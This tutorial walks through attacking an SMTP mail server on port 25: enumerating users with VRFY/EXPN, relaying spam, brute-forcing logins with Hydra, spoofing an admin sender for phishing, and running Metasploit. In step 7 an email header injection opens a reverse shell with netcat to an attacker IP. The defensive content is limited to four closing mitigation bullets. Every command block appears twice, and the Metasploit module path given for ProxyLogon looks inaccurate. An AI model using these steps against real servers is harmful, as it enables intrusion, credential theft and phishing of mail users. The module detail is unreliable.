Pentest on Port 25

Enumeration on port 25

If you have Telnet access to port 25 (SMTP Mail Hub), here are some steps to explore and potentially exploit it further, assuming it's a misconfigured or vulnerable mail server:

1. Enumerate the SMTP Server

First, check the SMTP banner and available commands:

telnet <target-ip> 25

telnet <target-ip> 25

You should see a response like:

220 mail.example.com ESMTP Postfix

220 mail.example.com ESMTP Postfix

Now, check for supported commands using:

EHLO test

EHLO test

Look for VRFY, EXPN, or other potentially useful options.

2. User Enumeration via VRFY & EXPN

If the server allows VRFY or EXPN, you can check for valid users:

VRFY admin
VRFY root
EXPN postmaster

VRFY admin
VRFY root
EXPN postmaster

If it returns a valid user, you can attempt further attacks.

3. Open Relay Testing (SPAM Attack)

Some misconfigured SMTP servers allow email relay, meaning you can send emails on behalf of the server. Try:

MAIL FROM:<attacker@example.com>
RCPT TO:<victim@example.com>
DATA
Subject: Hacked
This is a test email.
.

MAIL FROM:<attacker@example.com>
RCPT TO:<victim@example.com>
DATA
Subject: Hacked
This is a test email.
.

If successful, the server might be an open relay, which can be abused.

4. Check for Authentication Bypass

Some mail servers may have weak authentication or default credentials:

telnet <target-ip> 25
AUTH LOGIN

telnet <target-ip> 25
AUTH LOGIN

It may prompt for Base64-encoded username & password:

echo -n 'admin' | base64

echo -n 'admin' | base64

If authentication is required but weak, try brute-forcing using Hydra:

hydra -S -V -f -L users.txt -P passwords.txt smtp://<target-ip> -s 25

hydra -S -V -f -L users.txt -P passwords.txt smtp://<target-ip> -s 25

5. Exploiting Weak or Default Credentials

If you obtain credentials, try using them for IMAP/POP3 access (ports 110, 143, 993, 995) to read emails.

Check for SMTP user impersonation:

MAIL FROM:<admin@example.com>
RCPT TO:<victim@example.com>
DATA
Subject: Fake Admin Message
Your password is being reset.
.

MAIL FROM:<admin@example.com>
RCPT TO:<victim@example.com>
DATA
Subject: Fake Admin Message
Your password is being reset.
.

If it works, you can perform phishing attacks.

6. Exploit CVEs (Check for Known Vulnerabilities)

Find the SMTP server version from the banner:

220 mail.example.com ESMTP Postfix 2.9.6

220 mail.example.com ESMTP Postfix 2.9.6

Search for vulnerabilities:

searchsploit postfix

searchsploit postfix

Or check online at:

• Exploit-DB
• CVE Details
• NVD Database

7. Privilege Escalation via Misconfigured Mail Scripts

• If the SMTP server interacts with PHP, Perl, or Python scripts, you may inject commands via email headers.
• Try sending a crafted email:

From: "|/bin/bash -c 'nc -e /bin/bash <attacker-ip> 4444'"
To: admin@example.com
Subject: Exploit Test

From: "|/bin/bash -c 'nc -e /bin/bash <attacker-ip> 4444'"
To: admin@example.com
Subject: Exploit Test

• If the server is vulnerable, it could execute commands.

8. Gaining a Shell via Metasploit

If you suspect vulnerabilities, use Metasploit:

msfconsole
use exploit/multi/smtp/exchange_proxylogon
set RHOSTS <target-ip>
exploit

msfconsole
use exploit/multi/smtp/exchange_proxylogon
set RHOSTS <target-ip>
exploit

Try SMTP-based RCE exploits if the version is outdated.

Mitigation Recommendations (If You're Defending)

• Disable VRFY & EXPN
• Enforce Authentication (Disable Open Relay)
• Keep SMTP Services Updated
• Monitor Logs for Unauthorized Access